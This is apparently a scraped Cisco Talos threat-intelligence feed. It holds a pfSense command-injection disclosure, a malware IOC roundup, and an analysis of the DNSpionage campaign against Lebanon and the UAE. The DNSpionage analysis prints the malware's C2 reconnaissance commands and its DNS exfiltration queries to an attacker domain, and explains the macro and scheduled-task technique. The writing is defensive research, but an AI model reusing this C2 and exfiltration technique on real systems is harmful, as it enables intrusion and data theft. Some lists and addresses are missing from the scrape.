You are here


Subscribe to Talos feed
Talos Group, by Cisco
Updated: 2 hours 37 min ago

An introduction to offensive capabilities of Active Directory on UNIX

Tue, 04/12/2018 - 14:21
Tim Wadhwa-Brown of Portcullis Labs authored this post.

In preparation for our talk at Black Hat Europe, Security Advisory EMEAR would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises' Active Directory forests.

Background to active directory integration solutions
Having seen an uptick in unique UNIX infrastructures that are integrated into customers' existing Active Directory forests, the question becomes, "Does this present any concerns that may not be well understood?" This quickly became "What if an adversary could get into a UNIX box and then breach your domain?"

Within a typical Active Directory integration solution (in this case SSSD), the solution shares a striking similarity to what a user might see on Windows. Notably, you have:

  • DNS – Used for name resolution
  • LDAP – Used for "one-time identification" and assertion of identity
  • Kerberos – Used for ongoing authentication
  • SSSD – Like LSASS
  • PAM – Like msgina.dll or the more modern credential providers

You can see a breakdown of this process here. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. are typically pushed as flat files to hosts.

Our research
Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. Having worked with a variety of customers, it becomes apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. While we've been talking about successful attacks against components such as LSASS and Kerberos for quite some time, Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer. Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor how a blue team might spot an adversary performing them.

As a result of this research, we were able to develop tactics, tools, and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing appropriate strategies to allow blue teams to appropriately detect and respond to such incursions. The presentation and tactics, tools, and procedures for this talk will be available after our Blackhat EU talk. They will also be available here, and at our GitHub repo.

Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability

Mon, 03/12/2018 - 17:51

Brandon Stultz of Cisco Talos. of Cisco Talos discovered these vulnerabilities.
Executive summaryToday, Cisco Talos is disclosing a command injection vulnerability in Netgate pfSense system_advanced_misc.php powerd_normal_mode. pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability detailsNetgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)

This command injection vulnerability in Netgate pfSense is due to lack of sanitization on the 'powerd_normal_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_normal_mode' POST parameter. 
For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the 'powerd_ac_mode'parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_ac_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021) 

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the powerd_battery_mode', parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_battery_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

ConclusionCisco Talso tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.
CoverageThe following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules: 48178

Threat Roundup for Nov. 23 to Nov. 30

Fri, 30/11/2018 - 18:33

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 23 and Nov. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

The most prevalent threats highlighted in this roundup are:

  • Doc.Malware.Donoff-6759556-0
    Donoff is a malicious Microsoft Office document that leverages the Windows Command shell to launch PowerShell and download and execute an executable.
  • Doc.Malware.00536d-6758981-0
    Doc.Malware.00536d is the denomination of a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.
  • Xls.Dropper.Donoff-6758223-0
    Donoff is a payload delivery Office document that leverages the Windows Command shell to launch PowerShell to download and execute an executable.
  • Win.Trojan.Emotet-6758832-0
    Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails, and saw a resurgence recently during Black Friday.
  • Doc.Malware.Valyria-6757519-0
    Valyria is a malicious Microsoft Word document family that is used to distribute other malware. This campaign is currently spreading Emotet.
  • Win.Virus.Triusor-6757540-0
    Triusor is a highly polymorphic malware family. All the binaries are packed and obfuscated to hinder the static analysis. The malware contains code that complicates the dynamic analysis. Once it is executed, the samples perform code injection.
Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • 3ek6[.]top
  • pvy1[.]top
  • di29[.]top
  • 68d4[.]top
Files and or directories created
  • %LocalAppData%\Temp\sDweD.exe
  • %LocalAppData%\Temp\22dughsl.5qd.ps1
  • %LocalAppData%\Temp\4s5lt2th.dfc.psm1
  • %LocalAppData%\Temp\4e5cllpa.loj.psm1
  • %LocalAppData%\Temp\zbaj2qbd.fvr.ps1
File Hashes
  • 043a80eab9723a815096c7338c14105011f90c8fe1fe86a02c7c763726cfaa2a
  • 06aa7214d492067f4f6a8aa0a910b5b32aee7734e0525a471bb2ca111ee6f3d0
  • 09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558
  • 0a12a0000a78dfa623f71b0274df5b54f14dea7ddfe0799ad09cd76db2340441
  • 0a137fefbe8edc0652e9eb4c6a9694a199d758241c5d2e5da98351771372d8f0
  • 0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533
  • 0bdaed255c30cbce8a62153de694ffb80ede08f38ffd48706e415d457a21cbc1
  • 0e12bab4d0a4c65141c6d16cc8401efda84373a667dfdca21f56b61466ef9e7d
  • 0fe0f094572df903940dd8394c4c5c307705bb4146c794e77793f74a1e873327
  • 121c49ab3eccc4472a13766f874b489b025ef1d5d9e1f8243085cb07290177c6
  • 1459d9df5d2117263b051339baa35d5c28f54f5db6261135ea3d55c90e0985f7
  • 16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8
  • 1792e52f31de940e6d233967b62bd6712deae048fc110ba38cea000314781c16
  • 19badf1bbaa2ba68db14bf76e88b11a29492fb8d0cf180b83736a55d23a402be
  • 1b409f2f2146c2318580c73d5eaeafbdd79e39d4d4f3e5862323b3b6f4a6c916
  • 1cb58e56ae9f1a563e4789ee947f3941b90c5221f68ea0506da345fb63805826
  • 1f312a61244c970d254c24055b714138835b839f1da36b9ee1cfc1acf636fbf1
  • 24d62b3de48bf8b55b79fafcd17bf4a2cb8489a86358b26aa361193ad355dee4
  • 25fbacf14f3ea9918aa054f040c6cc73edb9450a34e2fe739b131d9c155e3e3d
  • 2696e57e2daac38a37ca382f979f1e4c61b20f516dd18ba33290fd00ef3eec7e
  • 29de1616d80266c566605928b266a43dc9e1cb7c1a1ed9c95e32d54efd4f6696
  • 2af5928b3dfeaeff2556b7fbf27ef564c0a67457ef2ec6ac41dcfdb214b84856
  • 2caaf8bad60e3e663993727b5ff26d685fb511892f90939d04e5f92765154687
  • 2eab620737103e94f0dcd33163071e8c0bd1cdaaf42c1d2e254d3e5e71851b24
  • 33d98771535a91ad332f2e59969b9f51a2bf811dbe886208e139e456cd124631

Screenshots of DetectionAMP




Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • cysioniven[.]com
Files and or directories created
  • %LocalAppData%\Temp\ebeqjwi0.znf.ps1
  • %LocalAppData%\Temp\xnakv4n3.jj0.psm1
  • %LocalAppData%\Temp\glq130qw.p3e.psm1
  • %LocalAppData%\Temp\haoyv1sm.xuc.ps1
  • %AppData%\900194a4.exe
File Hashes
  • 0ef9bfca2a912149f417a562853084d460565bdea22574d5f16d148905162d07
  • 1de14e103775d466cfe9222ba3305e254dc9e8c1efb4454343ab7ef1368cc91a
  • 70e0962256b2f98bf5ee698be7805dff03789cecdcac79519d3a0b0f327beef7
  • d53aded580b952005cec23cf6e4a79de8775f5fab4ad8d1e715556499d3bd1cf
  • dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6
  • e470428e5c12292e0e6723c22c9b1deefa94ec8d182179118474239db192002d
  • e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f
  • ecbb1cacd8390963a669b92cdd6a78f3e3dfffa93e794dde7426d4ef2780fab4
  • f371a9934b7e07b03d3b8982fa3573b456504bf8a9ad5fc6c86801c8f40aa7cb
  • fd4098a016d0a192efaf640c7376ea29272313eaed35d386305a0c87bd092a70

Screenshots of DetectionAMP



Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • momdopre[.]top
  • fileiiiililliliillitte[.]xyz
Files and or directories created
  • %SystemDrive%\Documents and Settings\Administrator\My Documents\rnohht`t.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upd22ef67fa.bat
  • %LocalAppData%\Temp\0w4zsktj.rxt.psm1
  • %LocalAppData%\Temp\vnug35u0.1pd.ps1
  • %LocalAppData%\Temp\cmnt0etf.0lt.psm1
  • %LocalAppData%\Temp\l21izk2f.bel.ps1
File Hashes
  • 0033f2a32856a043d34d491b0b79a3b1d25fbc084447ae801b94a6f4c8c67eec
  • 0587d2fd8a94400a1a8f87a59111b4ec53c69ab7e4a50e6a4c7dd6eb7590e0b3
  • 21df4279e0c9f6df6fb9ac8462e89ec9d2c777a3309dc9b8cf891a5232178800
  • 405e08a4ab0c60f3ddc24dc4f4998bb654fbfae556163c9b70a2545cb79c4414
  • 67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded
  • 6816c39d57cf2008ddd7ff252d97b9eb372c9c70ae9ac1834aee5beb0c24208c
  • 792436cb281c6704ea7f53f7532e7abdfa1370ecf071cb07fdf690f8f6469013
  • 7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b
  • 88ceeeed4a5d23e5c26c74300d2f1cc89376c09057ac848032b45e2777d15b3d
  • 99b43c4080202b48a2a729ed28dac8e3b98cd837494b2e419d71e7693b0652b8
  • 9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c
  • 9e8fb999bba4c93ae100c02ede01475ddbc2b7db624930574ed76ec5813dd451
  • bffbd9caa578af5caa98fcb20e0e5e4f55154e9e2ca256364c1f70538c04c5b9
  • d59e75ccdee3f0419fd247372697275fa45f391af8319a4cf1f56df411885805
  • dcbdf1859c62728c680ed7267f65b3a425aaed5c79b0f7404ef2e6541150d573
  • e723f535550c7c4398bbb29f16e76e7a59b8e314b0d0d602c96cda07da56cc17
  • ee5fb50a88b4b4a97bf82258cefc53e5de1bd416ddbdbee363dd9dc269ad867d
  • f60827889d806f6864b2af5e5c08c467c1f41b176ae47b51bb3918f5cafa68a9

Screenshots of DetectionAMP




Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 67[.]216[.]131[.]134
  • 88[.]235[.]54[.]71
  • 24[.]190[.]11[.]79
  • 192[.]208[.]165[.]34
  • 98[.]6[.]145[.]178
  • 207[.]244[.]67[.]214
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\4WPGc4HlcDQ.exe
File Hashes
  • 3567201c7de66370aa8eb0bd6242b0ce6edf3d4326c2255828470407a2a124b3
  • 3f2fa56542583680c7feeda31a5e16b85f11d74b710e6cb699ffcf15b6ca753a
  • 40ef85a4108702a3af09f9047b66585ffa2c73458cf9177a6ca67b4d8f388050
  • 529a8f391dd994779340aa59118b703256321bb421db138ee0b7db4265599b12
  • 5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9
  • 78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843
  • 7d42a037f8c824724e3525e40f09ae6b3f0eaca4278e4f0b95bb5ca50f008f7b
  • 864b1ce8feeed53db144afae131da20601bdf2951e198827177d40a233c490bd
  • c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6
  • c2ffeb181bc57e65011cb68ed33de62ef2ae79b12f320fa8362b096fe9f26430
  • d60149eb78e3df622e24afec34b06c7c4c1d26a401ec326ea5eaaa74df873e3b
  • e06807d11e7fba844ffe986638234633bfb93ccea283187b9019e0268b7876f4
  • f5e1c6d6d9bd26a6d0ae3b8657030dd40138e0371b824013821f48302e3f67f3
  • fe7d3a850371b6effe47525e39efbf705c4136e78b35f78228b1f986d30ceced

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • mnesenesse[.]com
  • ostrolista[.]com
Files and or directories created
  • %LocalAppData%\Temp\qrldddmq.hyb.psm1
  • %LocalAppData%\Temp\swfrthjc.vr1.ps1
File Hashes
  • 0734985f67598ec0a0caf9ca31edd54bc93c5072ab0facc09f3d5164c8930afe
  • 0ed8f1b95565876de24b49ab281f37d05d68130edc574ddd66300c5d5c9ad468
  • 10aab8954d92baa70b29b5d9c13e0bc5f60d21bb34a00c45e963251516441aff
  • 13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a
  • 15edcb2fc3b4d2fc1700f8e6837cd5c4759fb3791787c9cd9d0e16f129e0b234
  • 173ee1fdd02789e581caa6858422f4afcf3cebcf4791e4e52c8ffda11ef726e4
  • 1e1c3a6252578c94258f738d40ca36547631be604ad645e2c33a56cd26eab04b
  • 2aa5876411a940b91e5091fffc10774063e93d9007bc5b75703747f1ff6737d9
  • 35b3927d155688d396614850d95358c1d5b19e1d3487598788ffa1b881ecd156
  • 4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0
  • 500fe0e5847b6677fa8b91073d3c0fca1d80fef35cafd57b95634abab8973d42
  • 52577b1c77ef1a8e21c3681d4610bf47fec5fbae0f751f3396dc349d23186de8
  • 52fb2178d177421a16086155829b67154ddfc589ddc71a99b14f922741586479
  • 54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee
  • 5ac2183dc29d6cea617b06c5787019409662898e259f6b1c0c7465c69054bb26
  • 608c215893b99203b2d355253d42b14fe0bae98b22a891cfa2950c79d8b4dfe1
  • 61da1d5f5a0e508f1b79fee2a8ed00b37970f5c967cdfbf4a7933163752d777a
  • 6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f
  • 6e005fab674754f7a84fa80b873d02d8c321cfdfa7dbb7661d9d03fbd5c943d0
  • 6f9b7938e71ce992206f8a8c065159e36dfb26a5c146844a14c8689c68b46985
  • 7665239ea5a4928f88cc39051fde78ad6ef2660a248bb57550fc3adb69d414bc
  • 782071bd82d2a75149d55cf3a036add1a82349c42a77cecf17f5c74c3d535c04
  • 8aeddfcdce551eede421e527a4f1183b6378ca7bfbea07e0f4810d8c60357cec
  • 8eb3b092f7105734380156ddf60db8ab71d23270c55f7d9e98499bb11399b47a
  • 8fb33dc484fcfc5440e175cce2fe3efe3b70cfd1e61f8dbce5a846e7271a8469

Screenshots of DetectionAMP




Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\RegAsm.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\ilasm.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\jsc.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\ngen.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\vbc.exe
File Hashes
  • 0bc3007209f850ac764646065dcc8fdd85c46425dc98d72631e51045ba36069c
  • 14bc92fb1cb50fc6ffd2f34b701e57603fb99b96130c7e5b77187c2c3684a4db
  • 249ac287cada8bab59c445a286a8edb645f58035681c788687979c17d7eb766f
  • 3822de7241c17afa298071ab05ea0552456c7b9e78f2655b3471554f972520cf
  • 3adbbb8794d8244bbc905ad9b7d54046e494374f1856447fd174869911f8ebd2
  • 68d400f36ef0ac8869499a0185fc52a7d22add5a137fcdd9d73b7e47d8514049
  • 6a897eacea0f1a6773d19c6b1dbd101db860e3f8df547d97392c98a6aef0cce5
  • 6b34a29fcdf2ad7a74859ba38c3a622971c1bbdb6a1268d5c766fac441b9970d
  • 8cee25864d734f6624754ba68d47d0d6573ce6d4ca55c2cf3025a1435bf84685
  • 8f4bd4d1d9d337cfd8ffd0afe80213ae90063d274aad64b04aa8558b837218e6
  • 9df2784ba1fd594ab90357d799b26e0fa3abca65a5744ce3d62993d74b0f7e0f
  • 9e76c9877cb6820ff88937ee158cd59cbe16b9eb26526f0f1ec39d09601dca05
  • a3168cb7b3fd30eed135ba086e9e96984f56fd52317d185f3e988176440a5a25
  • db6317729cabcb31a4be51a3cc281bffc5dd38a8164861c4d7fe7a0be386f892
  • dc8c46a57c38955f4b6356d29662beeb0f88eeca50a94191df8892efab3bfc2e
  • ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59

Screenshots of DetectionAMP


DNSpionage Campaign Targets Middle East

Tue, 27/11/2018 - 13:02
This blog post was authored by Warren Mercer and Paul Rascagneres.

Executive Summary
Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks.

Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers.

In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful.

In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.

Infection vectorsFake job websites
The attackers' first attempt to compromise the user involved two malicious websites that mimicked legitimate sites that host job listings:

  • hr-wipro[.]com (with a redirection to
  • hr-suncor[.]com (with a redirection to

These sites hosted a malicious Microsoft Office document: hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc.

The document is a copy of a legitimate file available on the website for Suncor Energy, a Canadian sustainable energy company, and contains a malicious macro.

At this time, we don't know how the target received these links. The attackers most likely sent the malicious document via email as part of a spear-phishing campaign, but it also could have circulated via social media platforms, such as LinkedIn, in an attempt to legitimize the opportunity for a new job.

Malicious Office document No. 1
Upon opening the first Office document, the user receives a message that says "Content Mode Available:"
Malicious Office documents No. 2
During our investigation, we discovered another, similar, Office document deploying the same payload. In this campaign, the document was an Excel document that contained text in Russian:

The title of the document is "service formula for hydraulic fracturing." The document is a form that a hydraulic fracturing company would use to calculate its prices. The original name of the document is "RN.GRP(v0.41).xls." RN-GRP is a Russian service company that provides hydraulic fracturing services.

Macros used
The macros of the analysed samples can be divided into two steps:
  1. When the document is opened, the macro will decode a PE file encoded with base64 and will drop it in %UserProfile%\.oracleServices\svchost_serv.doc
  2. When the document is closed, the macro will rename the file "svchost_serv.doc" to "svchost_serv.exe." Then, the macro creates a scheduled task named "chromium updater v 37.5.0" in order to execute the binary. The scheduled task is executed immediately and repeatedly every minute.
The purpose of these two steps is to avoid sandbox detection.

The payload is executed when Microsoft Office is closed, meaning it requires human interaction to deploy it. The macros, while available through analysis, are also password-protected in Microsoft Word to stop the victim from exploring the macro code via Microsoft Office.

Additionally, the macro uses classical string obfuscation in order to avoid strings detection:

The "schedule.service" string is created by concatenation. The final payload is a remote administration tool that we named "DNSpionage."

DNSpionage malware
Malware analysis
The malware dropped by the malicious document is an undocumented remote administration tool. We are naming it DNSpionage due to the fact that it supports DNS tunneling as a covert channel to communicate with the attackers' infrastructure.

DNSpionage creates its own data in the running directory:
The Downloads directory is used by the attackers to store additional scripts and tools downloaded from the C2 server.

The Uploads directory is used by the attacker to temporarily store files before exfiltrating them to the C2 server.

The log.txt file contains logs in plain text.

All the executed commands can be logged in this file, it also contains the result of the commands.

The last file is Configure.txt. As expected, this file contains the malware configuration. The attackers can specify a custom command and control (C2) server URL, a URI and a domain that serves as a DNS covert channel. Additionally, the attackers can specify a custom base64 alphabet for obfuscation. We discovered that the attackers used a custom alphabet for each target.

All the data is transferred in JSON. That's why a large part of the code of the malware is the JSON library.

Communication Channels
The malware uses HTTP and DNS in order to communicate with the C2 server.

HTTP mode
A DNS request (to 0ffice36o[.]com) is performed with random data encoded with base64. This request registers the infected system and received the IP of an HTTP server ( during the investigation). An example of a DNS request:
The malware is able to craft DNS requests used to provide the attacker with further information. Here is an example of request:
In this context, the first four characters are randomly generated by the malware using rand(). The rest of the domain is then encoded in base32, once decoded the value is 1Fy2048. "Fy" is the target ID and "2048" (0x800) means "Config file not found". The request is performed if the configuration file was not retrieved on the infected machine. This is a message is used to inform the attacker.

The malware performs an initial HTTP request to retrieve its configuration at hxxp://IP/Client/Login?id=Fy.

This request will be used to create the configuration file, particularly to set the custom base64 dictionary.

The second HTTP request is hxxp://IP/index.html?id=XX (where "XX" is the ID for the infected system)

The purpose of this request is to retrieve the orders. The site is a fake Wikipedia page:

The commands are included in the source code of the page:

In this example, the commands are encoded with a standard base64 algorithm because we did not receive a custom alphabet. Here is another example with a custom alphabet in the configuration file:

Here are the three commands automatically sent to the compromised system:

  • {"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}
  • {"c": "hostname", "i": "-5000", "t": -1, "k": 0}
  • {"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}

The malware generates the following snippet of code after executing those commands:

The attackers ask for the username and hostname to retrieve the infected user's domains. The first step is clearly a reconnaissance phase. The data is eventually sent to hxxp://IP/Client/Upload.

Finally, CreateProcess() executes the commands, and the output is redirected to a pipe to the malware created with CreatePipe().

DNS mode
The malware also supports a DNS-only mode. In this mode, the orders and answers are handled via DNS. This option is dictated within the configure.txt file on the infected machine. Using DNS can sometimes be easier to allow for information to be sent back to the attacker as it will generally avoid proxies or web filtering in place by leveraging the DNS protocol.

First, the malware initiates a DNS query to ask for orders, for example:
The first four characters must be ignored, as mentioned earlier in the article this is random generated characters, and the relevant data is GBDVIAA0. The decoded value (base32) is "0GT\x00". GT is the target ID and \x00 the request number. The C2 server replies with an answer to the DNS request, this will be an IP address, whilst not always a valid IP it is perfectly acceptable for the DNS protocol, for example We believe the first value (0x0001) is the command ID for the next DNS request and 0x0003 is the size of the command.

Secondly, the malware performs a DNS query with the command ID:
t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 => "0GT\x01")
The C2 server will return a new IP: If we convert the value in ASCII we have "dir\x00", the command to be execute.

Finally, the result of the executed command will be sent by multiple DNS request:
gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -> GJDVIAJAKZXWY000 -> "2GT\x01 Vol"
TwGHGJDVIATVNVSSA000.0ffice36o[.]com -> GJDVIATVNVSSA000 -> "2GT\x02ume"
1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -> GJDVIA3JNYQGI000 -> "2GT\x03in d"
iucCGJDVIBDSNF3GK000.0ffice36o[.]com -> GJDVIBDSNF3GK000 -> "2GT\x04rive"
viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -> GJDVIBJAIMQGQ000 -> "2GT\x05 C h"
VictimologyThanks to the DNS exfiltration and Cisco Umbrella, we are able to identify the origin of some of the victims and the period of activity in October and November. Here is the graph for 0ffice36o[.]com, the DNS we mentioned above:

The queries were performed from Lebanon and UAE. This information is confirmed by the DNS redirection described in the next section.

DNS redirection
Talos discovered three IPs linked to the DNSpionage domain:


The three IPs are hosted by DeltaHost.

The last one was used in a DNS redirection attack between September and November. Multiple nameservers belonging to the public sector in Lebanon and UAE, as well as some companies in Lebanon, were apparently compromised, and hostnames under their control were pointed to attacker-controlled IP addresses. The attackers redirected the hostnames to the IP for a short time. Just before redirecting the IP, the attackers created a certificate matching the domain name with the Let's Encrypt service.

In this section, we will present all the DNS redirection instances we identified and the attacker-generated certificates associated with each. We don't know if the redirection attack was ultimately successful, or what exact purpose the DNS redirection served. However, the impact could be significant, as the attackers were able to intercept all traffic destined for these hostnames during this time. Because the attackers targeted email and VPN traffic specifically, they may have been used to harvest additional information, such as email and/or VPN credentials.

As incoming email would also be arriving at the attackers' IP address, if there was multi-factor authentication, it would allow the attackers to obtain MFA codes to abuse. Since the attackers were able to access email, they could carry out additional attacks or even blackmail the target.

The DNS redirection we identified occurs in multiple locations where there is no direct correlation of infrastructure, staff, or job routines. It also occurs in both the public and private sectors. Therefore, we believe it was not human error, nor a mistake by an administrative user within any of the impacted organisations. This was a deliberate, malicious attempt by the attackers to redirect DNS.

Lebanon government redirection
Talos identified that the Finance Ministry of Lebanon's email domain was the victim of a malicious a DNS redirection.

  • was redirected to on Nov. 6 06:19:13 GMT. On the same date at 05:07:25 a Let's Encrypt certificate was created.
UAE government redirection
UAE public domains were targeted, as well. We identified a domain from the Police (VPN and College) and the Telecommunication Regulatory Authority.

  • redirected to on Sept. 13 at 06:39:39 GMT. The same date at 05:37:54 a Let's Encrypt certificate was created.
  • redirected to on Sept. 15 at 07:17:51 GMT. A Let's Encrypt certificate was also created at 06:15:51 GMT.
  • redirected to on Sept. 24. A Let's Encrypt certificate was also created at 05:41:49 GMT.
Middle East Airline redirection
Talos discovered that Middle East Airlines (MEA), a Lebanese airline, was also the victim of DNS redirection.

  • redirected to on Nov. 14 at 11:58:36 GMT
    On Nov. 6, at 10:35:10 GMT, a Let's Encrypt certificate was created.

This certificate contains alternative names in the subject lines, this is a feature with DNS to allow for multiple domains to be added to the certificate for SSL activities:

These domains show a clear understanding of the victims' domains, leads us to believe the attacker was active in these environments to understand the specific domains and certificates they would be required to produce.

Our investigation discovered two events: the DNSpionage malware and a DNS redirection campaign. In the case of the malware campaign, we don't know the exact target, but we do know the attackers went after users in Lebanon and the UAE. However, as outlined above, we were able to uncover the targets of the redirect campaign.

We are highly confident that both of these campaigns came from the same actor. However, we do not know much about the location of the actors and their exact motivations. It is clear that this threat actor was able to redirect DNS from government-owned domains in two different countries over the course of two months, as well as a national Lebanese airline. They were able to work from the system's point of view by using a Windows malware, as well as the network, by using DNS exfiltration and redirection. It is unclear if these DNS redirection attacks were successful, but the attackers have kept up their efforts, launching five attacks so far this year, including one in the past two weeks.

Users should use these campaigns as proof that their endpoint protection as well as the network protection need to be as strong as possible. This is an advanced actor who obviously has their sights set on some important targets, and they don't appear to be letting up any time soon.

CoverageSnort rules 48444 and 48445 will prevent DNSpionage from making an outbound connection.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on

Indicators of Compromise (IOCs)
The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.

Fake job websites:

Malicious documents:
9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 (LB submit)
15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa (LB submit)
e279985597af22dddf1217ee35a8cffb17d1418ae1b4bae2d9ea79c0c6963a85 (RU submit)

DNSpionage samples:
2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec 82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969

C2 Server IPs:

C2 Server Domains:

DNS Hijack Domains (pointed to
